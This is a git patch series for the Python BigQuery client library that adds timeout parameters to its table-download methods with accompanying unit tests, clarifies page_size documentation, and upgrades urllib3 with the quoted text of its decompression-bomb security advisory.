From 4f67ba20b49159e81f645ed98e401b9bb1359c1a Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 8 Jan 2026 18:25:23 -0500 Subject: [PATCH 1/7] =?UTF-8?q?fix:=20add=20timeout=20parameter=20to=20to?= =?UTF-8?q?=5Fdataframe=20and=20to=5Farrow=20met=E2=80=A6=20(#2354)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description This PR adds a `timeout` parameter to the `to_dataframe()` and `to_arrow()` methods (and their corresponding `*_iterable`, `*_geodataframe` and `QueryJob` wrappers) in the BigQuery client library. This addresses an issue where these methods could hang indefinitely if the underlying BigQuery Storage API stream blocked (e.g., due to firewall issues or network interruptions) during the download phase. The added `timeout` parameter ensures that the download operation respects the specified time limit and raises a `concurrent.futures.TimeoutError` if it exceeds the duration. ### Changes - Modified `google/cloud/bigquery/_pandas_helpers.py`: - Updated `_download_table_bqstorage` to accept a `timeout` argument. - Implemented a timeout check within the result processing loop. - Updated wrapper functions `download_dataframe_bqstorage` and `download_arrow_bqstorage` to accept and pass the `timeout` parameter. - Modified `google/cloud/bigquery/table.py`: - Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`, `to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept and pass `timeout`. - Updated `_EmptyRowIterator` methods to match the `RowIterator` signature, preventing `TypeError` when a timeout is provided for empty result sets. - Modified `google/cloud/bigquery/job/query.py`: - Updated `QueryJob` methods (`to_arrow`, `to_dataframe`, `to_geodataframe`) to accept `timeout` and pass it to the result iterator. - Updated unit tests in `tests/unit/job/test_query_pandas.py`, `tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to reflect the signature changes. 
Fixes internal bug: b/468091307 --- google/cloud/bigquery/_pandas_helpers.py | 126 ++++++++++++++--------- google/cloud/bigquery/job/query.py | 17 +++ google/cloud/bigquery/table.py | 44 +++++++- tests/unit/job/test_query_pandas.py | 33 ++++++ tests/unit/test__pandas_helpers.py | 75 ++++++++++++++ tests/unit/test_table.py | 15 +++ tests/unit/test_table_pandas.py | 2 + 7 files changed, 257 insertions(+), 55 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 2dab03a06..5460f7ca7 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -26,6 +26,7 @@ import logging import queue import threading +import time import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ -869,6 +870,7 @@ def _download_table_bqstorage( max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, download_state: Optional[_DownloadState] = None, + timeout: Optional[float] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -899,6 +901,9 @@ def _download_table_bqstorage( download_state (Optional[_DownloadState]): A threadsafe state object which can be used to observe the behavior of the worker threads created by this method. + timeout (Optional[float]): + The number of seconds to wait for the download to complete. + If None, wait indefinitely. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -906,6 +911,8 @@ def _download_table_bqstorage( Raises: ValueError: If attempting to read from a specific partition or snapshot. + concurrent.futures.TimeoutError: + If the download does not complete within the specified timeout. 
Note: This method requires the `google-cloud-bigquery-storage` library @@ -973,60 +980,73 @@ def _download_table_bqstorage( worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) - with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: - try: - # Manually submit jobs and wait for download to complete rather - # than using pool.map because pool.map continues running in the - # background even if there is an exception on the main thread. - # See: https://github.com/googleapis/google-cloud-python/pull/7698 - not_done = [ - pool.submit( - _download_table_bqstorage_stream, - download_state, - bqstorage_client, - session, - stream, - worker_queue, - page_to_item, - ) - for stream in session.streams - ] - - while not_done: - # Don't block on the worker threads. For performance reasons, - # we want to block on the queue's get method, instead. This - # prevents the queue from filling up, because the main thread - # has smaller gaps in time between calls to the queue's get - # method. For a detailed explanation, see: - # https://friendliness.dev/2019/06/18/python-nowait/ - done, not_done = _nowait(not_done) - for future in done: - # Call result() on any finished threads to raise any - # exceptions encountered. - future.result() + # Manually manage the pool to control shutdown behavior on timeout. + pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) + wait_on_shutdown = True + start_time = time.time() - try: - frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) - yield frame - except queue.Empty: # pragma: NO COVER - continue + try: + # Manually submit jobs and wait for download to complete rather + # than using pool.map because pool.map continues running in the + # background even if there is an exception on the main thread. 
+ # See: https://github.com/googleapis/google-cloud-python/pull/7698 + not_done = [ + pool.submit( + _download_table_bqstorage_stream, + download_state, + bqstorage_client, + session, + stream, + worker_queue, + page_to_item, + ) + for stream in session.streams + ] + + while not_done: + # Check for timeout + if timeout is not None: + elapsed = time.time() - start_time + if elapsed > timeout: + wait_on_shutdown = False + raise concurrent.futures.TimeoutError( + f"Download timed out after {timeout} seconds." + ) + + # Don't block on the worker threads. For performance reasons, + # we want to block on the queue's get method, instead. This + # prevents the queue from filling up, because the main thread + # has smaller gaps in time between calls to the queue's get + # method. For a detailed explanation, see: + # https://friendliness.dev/2019/06/18/python-nowait/ + done, not_done = _nowait(not_done) + for future in done: + # Call result() on any finished threads to raise any + # exceptions encountered. + future.result() + + try: + frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) + yield frame + except queue.Empty: # pragma: NO COVER + continue - # Return any remaining values after the workers finished. - while True: # pragma: NO COVER - try: - frame = worker_queue.get_nowait() - yield frame - except queue.Empty: # pragma: NO COVER - break - finally: - # No need for a lock because reading/replacing a variable is - # defined to be an atomic operation in the Python language - # definition (enforced by the global interpreter lock). - download_state.done = True + # Return any remaining values after the workers finished. + while True: # pragma: NO COVER + try: + frame = worker_queue.get_nowait() + yield frame + except queue.Empty: # pragma: NO COVER + break + finally: + # No need for a lock because reading/replacing a variable is + # defined to be an atomic operation in the Python language + # definition (enforced by the global interpreter lock). 
+ download_state.done = True - # Shutdown all background threads, now that they should know to - # exit early. - pool.shutdown(wait=True) + # Shutdown all background threads, now that they should know to + # exit early. + pool.shutdown(wait=wait_on_shutdown) def download_arrow_bqstorage( @@ -1037,6 +1057,7 @@ def download_arrow_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): return _download_table_bqstorage( project_id, @@ -1047,6 +1068,7 @@ def download_arrow_bqstorage( page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) @@ -1060,6 +1082,7 @@ def download_dataframe_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -1071,6 +1094,7 @@ def download_dataframe_bqstorage( page_to_item=page_to_item, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 38b8a7148..e82deb1ef 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1857,6 +1857,7 @@ def to_arrow( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, max_results: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -1904,6 +1905,10 @@ def to_arrow( .. versionadded:: 2.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
+ Returns: pyarrow.Table A :class:`pyarrow.Table` populated with row data and column @@ -1921,6 +1926,7 @@ def to_arrow( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -1949,6 +1955,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Return a pandas DataFrame from a QueryJob @@ -2141,6 +2148,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data @@ -2174,6 +2185,7 @@ def to_dataframe( range_date_dtype=range_date_dtype, range_datetime_dtype=range_datetime_dtype, range_timestamp_dtype=range_timestamp_dtype, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -2191,6 +2203,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2269,6 +2282,9 @@ def to_geodataframe( then the data type will be ``numpy.dtype("object")``. BigQuery String type can be found at: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
Returns: geopandas.GeoDataFrame: @@ -2296,6 +2312,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 5efcb1958..195461006 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2087,6 +2087,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -2127,6 +2128,10 @@ def to_arrow_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -2144,6 +2149,7 @@ def to_arrow_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -2161,6 +2167,7 @@ def to_arrow( progress_bar_type: Optional[str] = None, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -2202,6 +2209,9 @@ def to_arrow( This argument does nothing if ``bqstorage_client`` is supplied. .. versionadded:: 1.24.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. 
+ If ``None``, wait indefinitely. Returns: pyarrow.Table @@ -2236,7 +2246,7 @@ def to_arrow( record_batches = [] for record_batch in self.to_arrow_iterable( - bqstorage_client=bqstorage_client + bqstorage_client=bqstorage_client, timeout=timeout ): record_batches.append(record_batch) @@ -2271,6 +2281,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2317,6 +2328,10 @@ def to_dataframe_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2344,6 +2359,7 @@ def to_dataframe_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2381,6 +2397,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create a pandas DataFrame by loading all pages of a query. @@ -2577,6 +2594,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
+ Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data and column @@ -2690,6 +2711,7 @@ def to_dataframe( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # Default date dtype is `db_dtypes.DateDtype()` that could cause out of bounds error, @@ -2768,6 +2790,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2902,6 +2925,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) return geopandas.GeoDataFrame( @@ -2917,9 +2941,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - pages = () - total_rows = 0 - def __init__( self, client=None, api_request=None, path=None, schema=(), *args, **kwargs ): @@ -2931,12 +2952,14 @@ def __init__( *args, **kwargs, ) + self._total_rows = 0 def to_arrow( self, progress_bar_type=None, bqstorage_client=None, create_bqstorage_client=True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create an empty class:`pyarrow.Table`. @@ -2944,6 +2967,7 @@ def to_arrow( progress_bar_type (str): Ignored. Added for compatibility with RowIterator. bqstorage_client (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pyarrow.Table: An empty :class:`pyarrow.Table`. @@ -2970,6 +2994,7 @@ def to_dataframe( range_date_dtype=None, range_datetime_dtype=None, range_timestamp_dtype=None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. 
@@ -2990,6 +3015,7 @@ def to_dataframe( range_date_dtype (Any): Ignored. Added for compatibility with RowIterator. range_datetime_dtype (Any): Ignored. Added for compatibility with RowIterator. range_timestamp_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3008,6 +3034,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -3021,6 +3048,7 @@ def to_geodataframe( int_dtype (Any): Ignored. Added for compatibility with RowIterator. float_dtype (Any): Ignored. Added for compatibility with RowIterator. string_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3038,6 +3066,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3056,6 +3085,9 @@ def to_dataframe_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. 
@@ -3071,6 +3103,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3086,6 +3119,9 @@ def to_arrow_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index a6c59b158..4390309f1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -1023,5 +1023,38 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) assert df is row_iterator.to_geodataframe.return_value + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_dataframe_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_dataframe(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_dataframe.assert_called_once() + call_args = row_iterator.to_dataframe.call_args + assert call_args.kwargs["timeout"] == timeout + + +@pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_arrow_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_arrow(bqstorage_client=bqstorage_client, timeout=timeout) + + 
wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_arrow.assert_called_once() + call_args = row_iterator.to_arrow.call_args + assert call_args.kwargs["timeout"] == timeout diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index bc94f5f54..a1cbb726b 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -13,12 +13,14 @@ # limitations under the License. import collections +import concurrent.futures import datetime import decimal import functools import gc import operator import queue +import time from typing import Union from unittest import mock import warnings @@ -2177,3 +2179,76 @@ def test_determine_requested_streams_invalid_max_stream_count(): """Tests that a ValueError is raised if max_stream_count is negative.""" with pytest.raises(ValueError): determine_requested_streams(preserve_order=False, max_stream_count=-1) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_error(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=[mock.Mock()]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def slow_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + # Block until the main thread sets done=True (which it will on timeout) + while not download_state.done: + time.sleep(0.01) + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=slow_download_stream + ): + # Use a very small timeout + 
result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=0.01 + ) + with pytest.raises(concurrent.futures.TimeoutError, match="timed out"): + list(result_gen) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_success(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=["stream/s0"]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def fast_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + worker_queue.put("result_page") + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=fast_download_stream + ): + # Use a generous timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=10.0 + ) + results = list(result_gen) + + assert results == ["result_page"] diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index af31d116b..97a1b4916 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2495,6 +2495,20 @@ def test_to_geodataframe(self): else: assert not hasattr(df, "crs") + def test_methods_w_timeout(self): + pytest.importorskip("pyarrow") + pytest.importorskip("geopandas") + # Ensure that the timeout parameter is accepted by all methods without raising a TypeError, + # even though the _EmptyRowIterator implementations do not use the timeout value. 
+ timeout = 42.0 + + # Call each type to ensure no TypeError is raised + self._make_one().to_arrow(timeout=timeout) + self._make_one().to_arrow_iterable(timeout=timeout) + self._make_one().to_dataframe(timeout=timeout) + self._make_one().to_dataframe_iterable(timeout=timeout) + self._make_one().to_geodataframe(timeout=timeout) + class TestRowIterator(unittest.TestCase): PYARROW_MINIMUM_VERSION = str(_versions_helpers._MIN_PYARROW_VERSION) @@ -5665,6 +5679,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index a4fa3fa39..64d8b1451 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -301,6 +301,7 @@ def test_rowiterator_to_geodataframe_with_default_dtypes( int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" @@ -358,6 +359,7 @@ def test_rowiterator_to_geodataframe_with_custom_dtypes( int_dtype=custom_int_dtype, float_dtype=custom_float_dtype, string_dtype=custom_string_dtype, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" From 73228432a3c821db05d898ea4a4788adf15b033d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 12 Jan 2026 12:09:58 -0600 Subject: [PATCH 2/7] =?UTF-8?q?docs:=20clarify=20that=20only=20jobs.query?= =?UTF-8?q?=20and=20jobs.getQueryResults=20are=20affec=E2=80=A6=20(#2349)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit …ted by page_size in query_and_wait Fixes internal issue b/433324499 Thank you for opening a Pull Request! 
Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # 🦕 Co-authored-by: Lingqing Gan --- google/cloud/bigquery/client.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e3a3cdb11..54c8886cd 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3655,6 +3655,11 @@ def query_and_wait( page_size (Optional[int]): The maximum number of rows in each page of results from the initial jobs.query request. Non-positive values are ignored. + + This parameter only affects the jobs.query and + jobs.getQueryResults API calls. Large results downloaded with + the BigQuery Storage Read API are intentionally unaffected + by this parameter. max_results (Optional[int]): The maximum total number of rows from this request. 
From 7b8ceea975a2e945eacb0a32c5946ff10e9fe20e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 Jan 2026 21:53:03 +0000 Subject: [PATCH 3/7] chore(deps): update dependency urllib3 to v2.6.3 [security] (#2357) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.6.0` → `==2.6.3` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. 
A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). ### Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. ### Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source. --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3) \================== - Fixed a high-severity security issue where decompression-bomb safeguards of the streaming API were bypassed when HTTP redirects were followed. (`GHSA-38jv-5279-wg99 `\_\_) - Started treating `Retry-After` times greater than 6 hours as 6 hours by default. (`#​3743 `\_\_) - Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten. (`#​3752 `\_\_) ### [`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2) \================== - Fixed `HTTPResponse.read_chunked()` to properly handle leftover data in the decoder's buffer when reading compressed chunked responses. (`#​3734 `\_\_) ### [`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1) \================== - Restore previously removed `HTTPResponse.getheaders()` and `HTTPResponse.getheader()` methods. (`#​3731 `\_\_)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ec5c7f2af..dd94deab6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.6.0 +urllib3==2.6.3 From 24d45d0d5bf89762f253ba6bd6fdbee9d5993422 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 29 Jan 2026 13:23:16 -0500 Subject: [PATCH 4/7] fix: updates timeout/retry code to respect hanging server (#2408) **Description** This PR fixes a crash when handling `_InactiveRpcError` during retry logic and ensures proper `timeout` propagation in `RowIterator.to_dataframe`. **Fixes** **Retry Logic Crash**: Addressed an issue in `google/cloud/bigquery/retry.py` where `_should_retry` would raise a `TypeError` when inspecting unstructured `gRPC` errors (like `_InactiveRpcError`). The fix adds robust error inspection to fallback gracefully when `exc.errors` is not subscriptable. **Timeout Propagation**: Added the missing `timeout` parameter to `RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`. 
